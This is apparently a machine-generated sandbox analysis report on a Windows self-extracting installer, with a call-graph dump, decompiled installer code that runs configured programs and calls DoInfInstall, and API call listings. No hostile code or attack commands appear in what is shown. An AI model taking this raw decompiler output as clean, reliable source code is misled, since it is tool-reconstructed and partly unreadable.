216c03 3206 216c17 _exit 3205->3206 3207 216c1e 3205->3207 3206->3207 3208 216c27 _cexit 3207->3208 3209 216c32 3207->3209 3208->3209 3056 214ad0 3064 213680 3056->3064 3059 214ae9 3060 214aee WriteFile 3061 214b14 3060->3061 3062 214b0f 3060->3062 3061->3062 3063 214b3b SendDlgItemMessageA 3061->3063 3063->3062 3065 213691 MsgWaitForMultipleObjects 3064->3065 3066 2136a9 PeekMessageA 3065->3066 3067 2136e8 3065->3067 3066->3065 3070 2136bc 3066->3070 3067->3059 3067->3060 3068 2136c7 DispatchMessageA 3069 2136d1 PeekMessageA 3068->3069 3069->3070 3070->3065 3070->3067 3070->3068 3070->3069 3071 214cd0 3072 214cf4 3071->3072 3073 214d0b 3071->3073 3074 214d02 3072->3074 3075 214b60 FindCloseChangeNotification 3072->3075 3073->3074 3077 214dcb 3073->3077 3080 214d25 3073->3080 3076 216ce0 4 API calls 3074->3076 3075->3074 3078 214e95 3076->3078 3079 214dd4 SetDlgItemTextA 3077->3079 3081 214de3 3077->3081 3079->3081 3080->3074 3094 214c37 3080->3094 3081->3074 3099 21476d 3081->3099 3085 214e38 3085->3074 3087 214980 25 API calls 3085->3087 3086 214b60 FindCloseChangeNotification 3088 214d99 SetFileAttributesA 3086->3088 3089 214e56 3087->3089 3088->3074 3089->3074 3090 214e64 3089->3090 3108 2147e0 LocalAlloc 3090->3108 3093 214e6f 3093->3074 3095 214c88 3094->3095 3096 214c4c DosDateTimeToFileTime 3094->3096 3095->3074 3095->3086 3096->3095 3097 214c5e LocalFileTimeToFileTime 3096->3097 3097->3095 3098 214c70 SetFileTime 3097->3098 3098->3095 3117 2166ae GetFileAttributesA 3099->3117 3101 21477b 3101->3085 3103 2147cc SetFileAttributesA 3104 2147db 3103->3104 3104->3085 3105 216517 24 API calls 3106 2147b1 3105->3106 3106->3103 3106->3104 3107 2147c2 3106->3107 3107->3103 3109 2147f6 3108->3109 3110 21480f LocalAlloc 3108->3110 3111 2144b9 20 API calls 3109->3111 3113 214831 3110->3113 3116 21480b 3110->3116 3111->3116 3114 2144b9 20 API calls 3113->3114 3115 214846 LocalFree 3114->3115 3115->3116 3116->3093 3118 214777 3117->3118 3118->3101 3118->3103 3118->3105 
3210 213210 3211 213227 3210->3211 3212 21328e EndDialog 3210->3212 3213 2133e2 GetDesktopWindow 3211->3213 3214 213235 3211->3214 3228 213239 3212->3228 3216 2143d0 11 API calls 3213->3216 3218 2132dd GetDlgItemTextA 3214->3218 3219 21324c 3214->3219 3214->3228 3217 2133f1 SetWindowTextA SendDlgItemMessageA 3216->3217 3220 21341f GetDlgItem EnableWindow 3217->3220 3217->3228 3221 213366 3218->3221 3229 2132fc 3218->3229 3222 213251 3219->3222 3223 2132c5 EndDialog 3219->3223 3220->3228 3225 2144b9 20 API calls 3221->3225 3224 21325c LoadStringA 3222->3224 3222->3228 3223->3228 3226 213294 3224->3226 3227 21327b 3224->3227 3225->3228 3248 214224 LoadLibraryA 3226->3248 3233 2144b9 20 API calls 3227->3233 3229->3221 3232 213331 GetFileAttributesA 3229->3232 3235 21337c 3232->3235 3236 21333f 3232->3236 3233->3212 3234 2132a5 SetDlgItemTextA 3234->3227 3234->3228 3237 21658a CharPrevA 3235->3237 3238 2144b9 20 API calls 3236->3238 3239 21338d 3237->3239 3240 213351 3238->3240 3241 2158c8 27 API calls 3239->3241 3240->3228 3242 21335a CreateDirectoryA 3240->3242 3243 213394 3241->3243 3242->3221 3242->3235 3243->3221 3244 2133a4 3243->3244 3245 2133c7 EndDialog 3244->3245 3246 21597d 34 API calls 3244->3246 3245->3228 3247 2133c3 3246->3247 3247->3228 3247->3245 3249 2143b2 3248->3249 3250 214246 GetProcAddress 3248->3250 3254 2144b9 20 API calls 3249->3254 3251 2143a4 FreeLibrary 3250->3251 3252 21425d GetProcAddress 3250->3252 3251->3249 3252->3251 3253 214274 GetProcAddress 3252->3253 3253->3251 3255 21428b 3253->3255 3256 21329d 3254->3256 3257 214295 GetTempPathA 3255->3257 3261 2142e1 3255->3261 3256->3228 3256->3234 3258 2142ad 3257->3258 3258->3258 3259 2142b4 CharPrevA 3258->3259 3260 2142d0 CharPrevA 3259->3260 3259->3261 3260->3261 3262 214390 FreeLibrary 3261->3262 3262->3256 3263 214a50 3264 214a9f ReadFile 3263->3264 3266 214a66 3263->3266 3265 214abb 3264->3265 3266->3265 3267 214a82 memcpy 3266->3267 3267->3265 3268 213450 3269 2134d3 EndDialog 
3268->3269 3270 21345e 3268->3270 3273 21346a 3269->3273 3271 21349a GetDesktopWindow 3270->3271 3274 213465 3270->3274 3272 2143d0 11 API calls 3271->3272 3275 2134ac SetWindowTextA SetDlgItemTextA SetForegroundWindow 3272->3275 3274->3273 3276 21348c EndDialog 3274->3276 3275->3273 3276->3273

Callgraph

• Executed
• Not Executed
• Opacity -> Relevance
• Disassembly available

                                                                                                                                                                                                        Control-flow Graph

[Figure: control-flow graph, starting at block 213ba2-213bd9; legend: Executed / Not Executed]
                                                                                                                                                                                                        C-Code - Quality: 82%
                                                                                                                                                                                                        			E00213BA2() {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				signed int _v12;
                                                                                                                                                                                                        				char _v276;
                                                                                                                                                                                                        				char _v280;
                                                                                                                                                                                                        				short _v300;
                                                                                                                                                                                                        				intOrPtr _v304;
                                                                                                                                                                                                        				void _v348;
                                                                                                                                                                                                        				char _v352;
                                                                                                                                                                                                        				intOrPtr _v356;
                                                                                                                                                                                                        				signed int _v360;
                                                                                                                                                                                                        				short _v364;
                                                                                                                                                                                                        				char* _v368;
                                                                                                                                                                                                        				intOrPtr _v372;
                                                                                                                                                                                                        				void* _v376;
                                                                                                                                                                                                        				intOrPtr _v380;
                                                                                                                                                                                                        				char _v384;
                                                                                                                                                                                                        				signed int _v388;
                                                                                                                                                                                                        				intOrPtr _v392;
                                                                                                                                                                                                        				signed int _v396;
                                                                                                                                                                                                        				signed int _v400;
                                                                                                                                                                                                        				signed int _v404;
                                                                                                                                                                                                        				void* _v408;
                                                                                                                                                                                                        				void* _v424;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t69;
                                                                                                                                                                                                        				signed int _t76;
                                                                                                                                                                                                        				void* _t77;
                                                                                                                                                                                                        				signed int _t79;
                                                                                                                                                                                                        				short _t96;
                                                                                                                                                                                                        				signed int _t97;
                                                                                                                                                                                                        				intOrPtr _t98;
                                                                                                                                                                                                        				signed int _t101;
                                                                                                                                                                                                        				signed int _t104;
                                                                                                                                                                                                        				signed int _t108;
                                                                                                                                                                                                        				int _t112;
                                                                                                                                                                                                        				void* _t115;
                                                                                                                                                                                                        				signed char _t118;
                                                                                                                                                                                                        				void* _t125;
                                                                                                                                                                                                        				signed int _t127;
                                                                                                                                                                                                        				void* _t128;
                                                                                                                                                                                                        				struct HINSTANCE__* _t129;
                                                                                                                                                                                                        				void* _t130;
                                                                                                                                                                                                        				short _t137;
                                                                                                                                                                                                        				char* _t140;
                                                                                                                                                                                                        				signed char _t144;
                                                                                                                                                                                                        				signed char _t145;
                                                                                                                                                                                                        				signed int _t149;
                                                                                                                                                                                                        				void* _t150;
                                                                                                                                                                                                        				void* _t151;
                                                                                                                                                                                                        				signed int _t153;
                                                                                                                                                                                                        				void* _t155;
                                                                                                                                                                                                        				void* _t156;
                                                                                                                                                                                                        				signed int _t157;
                                                                                                                                                                                                        				signed int _t162;
                                                                                                                                                                                                        				signed int _t164;
                                                                                                                                                                                                        				void* _t165;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t164 = (_t162 & 0xfffffff8) - 0x194;
                                                                                                                                                                                                        				_t69 =  *0x218004; // 0x58ac7c6d
                                                                                                                                                                                                        				_v8 = _t69 ^ _t164;
                                                                                                                                                                                                        				_t153 = 0;
                                                                                                                                                                                                        				 *0x219124 =  *0x219124 & 0;
                                                                                                                                                                                                        				_t149 = 0;
                                                                                                                                                                                                        				_v388 = 0;
                                                                                                                                                                                                        				_v384 = 0;
                                                                                                                                                                                                        				_t165 =  *0x218a28 - _t153; // 0x0
                                                                                                                                                                                                        				if(_t165 != 0) {
                                                                                                                                                                                                        					L3:
                                                                                                                                                                                                        					_t127 = 0;
                                                                                                                                                                                                        					_v392 = 0;
                                                                                                                                                                                                        					while(1) {
                                                                                                                                                                                                        						_v400 = _v400 & 0x00000000;
                                                                                                                                                                                                        						memset( &_v348, 0, 0x44);
                                                                                                                                                                                                        						_t164 = _t164 + 0xc;
                                                                                                                                                                                                        						_v348 = 0x44;
                                                                                                                                                                                                        						if( *0x218c42 != 0) {
                                                                                                                                                                                                        							goto L26;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t146 =  &_v396;
                                                                                                                                                                                                        						_t115 = E0021468F("SHOWWINDOW",  &_v396, 4);
                                                                                                                                                                                                        						if(_t115 == 0 || _t115 > 4) {
                                                                                                                                                                                                        							L25:
                                                                                                                                                                                                        							_t146 = 0x4b1;
                                                                                                                                                                                                        							E002144B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                        							 *0x219124 = 0x80070714;
                                                                                                                                                                                                        							goto L62;
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							if(_v396 != 1) {
                                                                                                                                                                                                        								__eflags = _v396 - 2;
                                                                                                                                                                                                        								if(_v396 != 2) {
                                                                                                                                                                                                        									_t137 = 3;
                                                                                                                                                                                                        									__eflags = _v396 - _t137;
                                                                                                                                                                                                        									if(_v396 == _t137) {
                                                                                                                                                                                                        										_v304 = 1;
                                                                                                                                                                                                        										_v300 = _t137;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									goto L14;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								_push(6);
                                                                                                                                                                                                        								_v304 = 1;
                                                                                                                                                                                                        								_pop(0);
                                                                                                                                                                                                        								goto L11;
                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                        								_v304 = 1;
                                                                                                                                                                                                        								L11:
                                                                                                                                                                                                        								_v300 = 0;
                                                                                                                                                                                                        								L14:
                                                                                                                                                                                                        								if(_t127 != 0) {
                                                                                                                                                                                                        									L27:
                                                                                                                                                                                                        									_t155 = 1;
                                                                                                                                                                                                        									__eflags = _t127 - 1;
                                                                                                                                                                                                        									if(_t127 != 1) {
                                                                                                                                                                                                        										L31:
                                                                                                                                                                                                        										_t132 =  &_v280;
                                                                                                                                                                                                        										_t76 = E00211AE8( &_v280,  &_v408,  &_v404); // executed
                                                                                                                                                                                                        										__eflags = _t76;
                                                                                                                                                                                                        										if(_t76 == 0) {
                                                                                                                                                                                                        											L62:
                                                                                                                                                                                                        											_t77 = 0;
                                                                                                                                                                                                        											L63:
                                                                                                                                                                                                        											_pop(_t150);
                                                                                                                                                                                                        											_pop(_t156);
                                                                                                                                                                                                        											_pop(_t128);
                                                                                                                                                                                                        											return E00216CE0(_t77, _t128, _v12 ^ _t164, _t146, _t150, _t156);
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        										_t157 = _v404;
                                                                                                                                                                                                        										__eflags = _t149;
                                                                                                                                                                                                        										if(_t149 != 0) {
                                                                                                                                                                                                        											L37:
                                                                                                                                                                                                        											__eflags = _t157;
                                                                                                                                                                                                        											if(_t157 == 0) {
                                                                                                                                                                                                        												L57:
                                                                                                                                                                                                        												_t151 = _v408;
                                                                                                                                                                                                        												_t146 =  &_v352;
                                                                                                                                                                                                        												_t130 = _t151; // executed
                                                                                                                                                                                                        												_t79 = E00213FEF(_t130,  &_v352); // executed
                                                                                                                                                                                                        												__eflags = _t79;
                                                                                                                                                                                                        												if(_t79 == 0) {
                                                                                                                                                                                                        													L61:
                                                                                                                                                                                                        													LocalFree(_t151);
                                                                                                                                                                                                        													goto L62;
                                                                                                                                                                                                        												}
                                                                                                                                                                                                        												L58:
                                                                                                                                                                                                        												LocalFree(_t151);
                                                                                                                                                                                                        												_t127 = _t127 + 1;
                                                                                                                                                                                                        												_v396 = _t127;
                                                                                                                                                                                                        												__eflags = _t127 - 2;
                                                                                                                                                                                                        												if(_t127 >= 2) {
                                                                                                                                                                                                        													_t155 = 1;
                                                                                                                                                                                                        													__eflags = 1;
                                                                                                                                                                                                        													L69:
                                                                                                                                                                                                        													__eflags =  *0x218580;
                                                                                                                                                                                                        													if( *0x218580 != 0) {
                                                                                                                                                                                                        														E00212267();
                                                                                                                                                                                                        													}
                                                                                                                                                                                                        													_t77 = _t155;
                                                                                                                                                                                                        													goto L63;
                                                                                                                                                                                                        												}
                                                                                                                                                                                                        												_t153 = _v392;
                                                                                                                                                                                                        												_t149 = _v388;
                                                                                                                                                                                                        												continue;
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        											L38:
                                                                                                                                                                                                        											__eflags =  *0x218180;
                                                                                                                                                                                                        											if( *0x218180 == 0) {
                                                                                                                                                                                                        												_t146 = 0x4c7;
                                                                                                                                                                                                        												E002144B9(0, 0x4c7, 0, 0, 0x10, 0);
                                                                                                                                                                                                        												LocalFree(_v424);
                                                                                                                                                                                                        												 *0x219124 = 0x8007042b;
                                                                                                                                                                                                        												goto L62;
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        											__eflags = _t157;
                                                                                                                                                                                                        											if(_t157 == 0) {
                                                                                                                                                                                                        												goto L57;
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        											__eflags =  *0x219a34 & 0x00000004;
                                                                                                                                                                                                        											if(__eflags == 0) {
                                                                                                                                                                                                        												goto L57;
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        											_t129 = E00216495(_t127, _t132, _t157, __eflags);
                                                                                                                                                                                                        											__eflags = _t129;
                                                                                                                                                                                                        											if(_t129 == 0) {
                                                                                                                                                                                                        												_t146 = 0x4c8;
                                                                                                                                                                                                        												E002144B9(0, 0x4c8, "advpack.dll", 0, 0x10, 0);
                                                                                                                                                                                                        												L65:
                                                                                                                                                                                                        												LocalFree(_v408);
                                                                                                                                                                                                        												 *0x219124 = E00216285();
                                                                                                                                                                                                        												goto L62;
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        											_t146 = GetProcAddress(_t129, "DoInfInstall");
                                                                                                                                                                                                        											_v404 = _t146;
                                                                                                                                                                                                        											__eflags = _t146;
                                                                                                                                                                                                        											if(_t146 == 0) {
                                                                                                                                                                                                        												_t146 = 0x4c9;
                                                                                                                                                                                                        												__eflags = 0;
                                                                                                                                                                                                        												E002144B9(0, 0x4c9, "DoInfInstall", 0, 0x10, 0);
                                                                                                                                                                                                        												FreeLibrary(_t129);
                                                                                                                                                                                                        												goto L65;
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        											__eflags =  *0x218a30;
                                                                                                                                                                                                        											_t151 = _v408;
                                                                                                                                                                                                        											_v384 = 0;
                                                                                                                                                                                                        											_v368 =  &_v280;
                                                                                                                                                                                                        											_t96 =  *0x219a40; // 0x3
                                                                                                                                                                                                        											_v364 = _t96;
                                                                                                                                                                                                        											_t97 =  *0x218a38 & 0x0000ffff;
                                                                                                                                                                                                        											_v380 = 0x219154;
                                                                                                                                                                                                        											_v376 = _t151;
                                                                                                                                                                                                        											_v372 = 0x2191e4;
                                                                                                                                                                                                        											_v360 = _t97;
                                                                                                                                                                                                        											if( *0x218a30 != 0) {
                                                                                                                                                                                                        												_t97 = _t97 | 0x00010000;
                                                                                                                                                                                                        												__eflags = _t97;
                                                                                                                                                                                                        												_v360 = _t97;
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        											_t144 =  *0x219a34; // 0x1
                                                                                                                                                                                                        											__eflags = _t144 & 0x00000008;
                                                                                                                                                                                                        											if((_t144 & 0x00000008) != 0) {
                                                                                                                                                                                                        												_t97 = _t97 | 0x00020000;
                                                                                                                                                                                                        												__eflags = _t97;
                                                                                                                                                                                                        												_v360 = _t97;
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        											__eflags = _t144 & 0x00000010;
                                                                                                                                                                                                        											if((_t144 & 0x00000010) != 0) {
                                                                                                                                                                                                        												_t97 = _t97 | 0x00040000;
                                                                                                                                                                                                        												__eflags = _t97;
                                                                                                                                                                                                        												_v360 = _t97;
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        											_t145 =  *0x218d48; // 0x0
                                                                                                                                                                                                        											__eflags = _t145 & 0x00000040;
                                                                                                                                                                                                        											if((_t145 & 0x00000040) != 0) {
                                                                                                                                                                                                        												_t97 = _t97 | 0x00080000;
                                                                                                                                                                                                        												__eflags = _t97;
                                                                                                                                                                                                        												_v360 = _t97;
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        											__eflags = _t145;
                                                                                                                                                                                                        											if(_t145 < 0) {
                                                                                                                                                                                                        												_t104 = _t97 | 0x00100000;
                                                                                                                                                                                                        												__eflags = _t104;
                                                                                                                                                                                                        												_v360 = _t104;
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        											_t98 =  *0x219a38; // 0x0
                                                                                                                                                                                                        											_v356 = _t98;
                                                                                                                                                                                                        											_t130 = _t146;
                                                                                                                                                                                                        											 *0x21a288( &_v384);
                                                                                                                                                                                                        											_t101 = _v404();
                                                                                                                                                                                                        											__eflags = _t164 - _t164;
                                                                                                                                                                                                        											if(_t164 != _t164) {
                                                                                                                                                                                                        												_t130 = 4;
                                                                                                                                                                                                        												asm("int 0x29");
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        											 *0x219124 = _t101;
                                                                                                                                                                                                        											_push(_t129);
                                                                                                                                                                                                        											__eflags = _t101;
                                                                                                                                                                                                        											if(_t101 < 0) {
                                                                                                                                                                                                        												FreeLibrary();
                                                                                                                                                                                                        												goto L61;
                                                                                                                                                                                                        											} else {
                                                                                                                                                                                                        												FreeLibrary();
                                                                                                                                                                                                        												_t127 = _v400;
                                                                                                                                                                                                        												goto L58;
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        										__eflags =  *0x219a40 - 1; // 0x3
                                                                                                                                                                                                        										if(__eflags == 0) {
                                                                                                                                                                                                        											goto L37;
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        										__eflags =  *0x218a20;
                                                                                                                                                                                                        										if( *0x218a20 == 0) {
                                                                                                                                                                                                        											goto L37;
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        										__eflags = _t157;
                                                                                                                                                                                                        										if(_t157 != 0) {
                                                                                                                                                                                                        											goto L38;
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        										_v388 = 1;
                                                                                                                                                                                                        										E0021202A(_t146); // executed
                                                                                                                                                                                                        										goto L37;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									_t146 =  &_v280;
                                                                                                                                                                                                        									_t108 = E0021468F("POSTRUNPROGRAM",  &_v280, 0x104);
                                                                                                                                                                                                        									__eflags = _t108;
                                                                                                                                                                                                        									if(_t108 == 0) {
                                                                                                                                                                                                        										goto L25;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									__eflags =  *0x218c42;
                                                                                                                                                                                                        									if( *0x218c42 != 0) {
                                                                                                                                                                                                        										goto L69;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									_t112 = CompareStringA(0x7f, 1,  &_v280, 0xffffffff, "<None>", 0xffffffff);
                                                                                                                                                                                                        									__eflags = _t112 == 0;
                                                                                                                                                                                                        									if(_t112 == 0) {
                                                                                                                                                                                                        										goto L69;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									goto L31;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								_t118 =  *0x218a38; // 0x0
                                                                                                                                                                                                        								if(_t118 == 0) {
                                                                                                                                                                                                        									L23:
                                                                                                                                                                                                        									if(_t153 != 0) {
                                                                                                                                                                                                        										goto L31;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									_t146 =  &_v276;
                                                                                                                                                                                                        									if(E0021468F("RUNPROGRAM",  &_v276, 0x104) != 0) {
                                                                                                                                                                                                        										goto L27;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									goto L25;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								if((_t118 & 0x00000001) == 0) {
                                                                                                                                                                                                        									__eflags = _t118 & 0x00000002;
                                                                                                                                                                                                        									if((_t118 & 0x00000002) == 0) {
                                                                                                                                                                                                        										goto L62;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									_t140 = "USRQCMD";
                                                                                                                                                                                                        									L20:
                                                                                                                                                                                                        									_t146 =  &_v276;
                                                                                                                                                                                                        									if(E0021468F(_t140,  &_v276, 0x104) == 0) {
                                                                                                                                                                                                        										goto L25;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									if(CompareStringA(0x7f, 1,  &_v276, 0xffffffff, "<None>", 0xffffffff) - 2 != 0xfffffffe) {
                                                                                                                                                                                                        										_t153 = 1;
                                                                                                                                                                                                        										_v388 = 1;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									goto L23;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								_t140 = "ADMQCMD";
                                                                                                                                                                                                        								goto L20;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						L26:
                                                                                                                                                                                                        						_push(_t130);
                                                                                                                                                                                                        						_t146 = 0x104;
                                                                                                                                                                                                        						E00211781( &_v276, 0x104, _t130, 0x218c42);
                                                                                                                                                                                                        						goto L27;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t130 = "REBOOT";
                                                                                                                                                                                                        				_t125 = E0021468F(_t130, 0x219a2c, 4);
                                                                                                                                                                                                        				if(_t125 == 0 || _t125 > 4) {
                                                                                                                                                                                                        					goto L25;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					goto L3;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        			}

                                                                                                                                                                                                        0x00213f15
                                                                                                                                                                                                        0x00213f1a
                                                                                                                                                                                                        0x00213f1c
                                                                                                                                                                                                        0x00213f46
                                                                                                                                                                                                        0x00213f47
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00213f47
                                                                                                                                                                                                        0x00213f1e
                                                                                                                                                                                                        0x00213f1f
                                                                                                                                                                                                        0x00213f25
                                                                                                                                                                                                        0x00213f26
                                                                                                                                                                                                        0x00213f2a
                                                                                                                                                                                                        0x00213f2d
                                                                                                                                                                                                        0x00213fd9
                                                                                                                                                                                                        0x00213fd9
                                                                                                                                                                                                        0x00213fda
                                                                                                                                                                                                        0x00213fda
                                                                                                                                                                                                        0x00213fe1
                                                                                                                                                                                                        0x00213fe3
                                                                                                                                                                                                        0x00213fe3
                                                                                                                                                                                                        0x00213fe8
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00213fe8
                                                                                                                                                                                                        0x00213f33
                                                                                                                                                                                                        0x00213f37
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00213f37
                                                                                                                                                                                                        0x00213dee
                                                                                                                                                                                                        0x00213dee
                                                                                                                                                                                                        0x00213df5
                                                                                                                                                                                                        0x00213fad
                                                                                                                                                                                                        0x00213fb9
                                                                                                                                                                                                        0x00213fc2
                                                                                                                                                                                                        0x00213fc8
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00213fc8
                                                                                                                                                                                                        0x00213dfb
                                                                                                                                                                                                        0x00213dfd
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00213e03
                                                                                                                                                                                                        0x00213e0a
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00213e15
                                                                                                                                                                                                        0x00213e17
                                                                                                                                                                                                        0x00213e19
                                                                                                                                                                                                        0x00213f94
                                                                                                                                                                                                        0x00213fa4
                                                                                                                                                                                                        0x00213f7c
                                                                                                                                                                                                        0x00213f80
                                                                                                                                                                                                        0x00213f8b
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00213f8b
                                                                                                                                                                                                        0x00213e2c
                                                                                                                                                                                                        0x00213e30
                                                                                                                                                                                                        0x00213e34
                                                                                                                                                                                                        0x00213e36
                                                                                                                                                                                                        0x00213f69
                                                                                                                                                                                                        0x00213f6e
                                                                                                                                                                                                        0x00213f70
                                                                                                                                                                                                        0x00213f76
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00213f76
                                                                                                                                                                                                        0x00213e3c
                                                                                                                                                                                                        0x00213e43
                                                                                                                                                                                                        0x00213e47
                                                                                                                                                                                                        0x00213e52
                                                                                                                                                                                                        0x00213e56
                                                                                                                                                                                                        0x00213e5c
                                                                                                                                                                                                        0x00213e61
                                                                                                                                                                                                        0x00213e68
                                                                                                                                                                                                        0x00213e70
                                                                                                                                                                                                        0x00213e74
                                                                                                                                                                                                        0x00213e7c
                                                                                                                                                                                                        0x00213e80
                                                                                                                                                                                                        0x00213e82
                                                                                                                                                                                                        0x00213e82
                                                                                                                                                                                                        0x00213e87
                                                                                                                                                                                                        0x00213e87
                                                                                                                                                                                                        0x00213e8b
                                                                                                                                                                                                        0x00213e91
                                                                                                                                                                                                        0x00213e94
                                                                                                                                                                                                        0x00213e96
                                                                                                                                                                                                        0x00213e96
                                                                                                                                                                                                        0x00213e9b
                                                                                                                                                                                                        0x00213e9b
                                                                                                                                                                                                        0x00213e9f
                                                                                                                                                                                                        0x00213ea2
                                                                                                                                                                                                        0x00213ea4
                                                                                                                                                                                                        0x00213ea4
                                                                                                                                                                                                        0x00213ea9
                                                                                                                                                                                                        0x00213ea9
                                                                                                                                                                                                        0x00213ead
                                                                                                                                                                                                        0x00213eb3
                                                                                                                                                                                                        0x00213eb6
                                                                                                                                                                                                        0x00213eb8
                                                                                                                                                                                                        0x00213eb8
                                                                                                                                                                                                        0x00213ebd
                                                                                                                                                                                                        0x00213ebd
                                                                                                                                                                                                        0x00213ec1
                                                                                                                                                                                                        0x00213ec3
                                                                                                                                                                                                        0x00213ec5
                                                                                                                                                                                                        0x00213ec5
                                                                                                                                                                                                        0x00213eca
                                                                                                                                                                                                        0x00213eca
                                                                                                                                                                                                        0x00213ece
                                                                                                                                                                                                        0x00213ed5
                                                                                                                                                                                                        0x00213ed9
                                                                                                                                                                                                        0x00213ee0
                                                                                                                                                                                                        0x00213ee6
                                                                                                                                                                                                        0x00213eea
                                                                                                                                                                                                        0x00213eec
                                                                                                                                                                                                        0x00213eee
                                                                                                                                                                                                        0x00213ef3
                                                                                                                                                                                                        0x00213ef3
                                                                                                                                                                                                        0x00213ef5
                                                                                                                                                                                                        0x00213efa
                                                                                                                                                                                                        0x00213efb
                                                                                                                                                                                                        0x00213efd
                                                                                                                                                                                                        0x00213f40
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00213eff
                                                                                                                                                                                                        0x00213eff
                                                                                                                                                                                                        0x00213f05
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00213f05
                                                                                                                                                                                                        0x00213efd
                                                                                                                                                                                                        0x00213dc7
                                                                                                                                                                                                        0x00213dce
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • memset.MSVCRT ref: 00213C11
                                                                                                                                                                                                        • CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,00000004), ref: 00213CDC
                                                                                                                                                                                                          • Part of subcall function 0021468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 002146A0
                                                                                                                                                                                                          • Part of subcall function 0021468F: SizeofResource.KERNEL32(00000000,00000000,?,00212D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 002146A9
                                                                                                                                                                                                          • Part of subcall function 0021468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 002146C3
                                                                                                                                                                                                          • Part of subcall function 0021468F: LoadResource.KERNEL32(00000000,00000000,?,00212D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 002146CC
                                                                                                                                                                                                          • Part of subcall function 0021468F: LockResource.KERNEL32(00000000,?,00212D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 002146D3
                                                                                                                                                                                                          • Part of subcall function 0021468F: memcpy_s.MSVCRT ref: 002146E5
                                                                                                                                                                                                          • Part of subcall function 0021468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 002146EF
                                                                                                                                                                                                        • CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,?,00218C42), ref: 00213D8F
                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,DoInfInstall), ref: 00213E26
                                                                                                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,00218C42), ref: 00213EFF
                                                                                                                                                                                                        • LocalFree.KERNEL32(?,?,?,?,00218C42), ref: 00213F1F
                                                                                                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,00218C42), ref: 00213F40
                                                                                                                                                                                                        • LocalFree.KERNEL32(?,?,?,?,00218C42), ref: 00213F47
                                                                                                                                                                                                        • FreeLibrary.KERNEL32(00000000,DoInfInstall,00000000,00000010,00000000,?,00218C42), ref: 00213F76
                                                                                                                                                                                                        • LocalFree.KERNEL32(?,advpack.dll,00000000,00000010,00000000,?,?,?,00218C42), ref: 00213F80
                                                                                                                                                                                                        • LocalFree.KERNEL32(?,00000000,00000000,00000010,00000000,?,?,?,00218C42), ref: 00213FC2
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
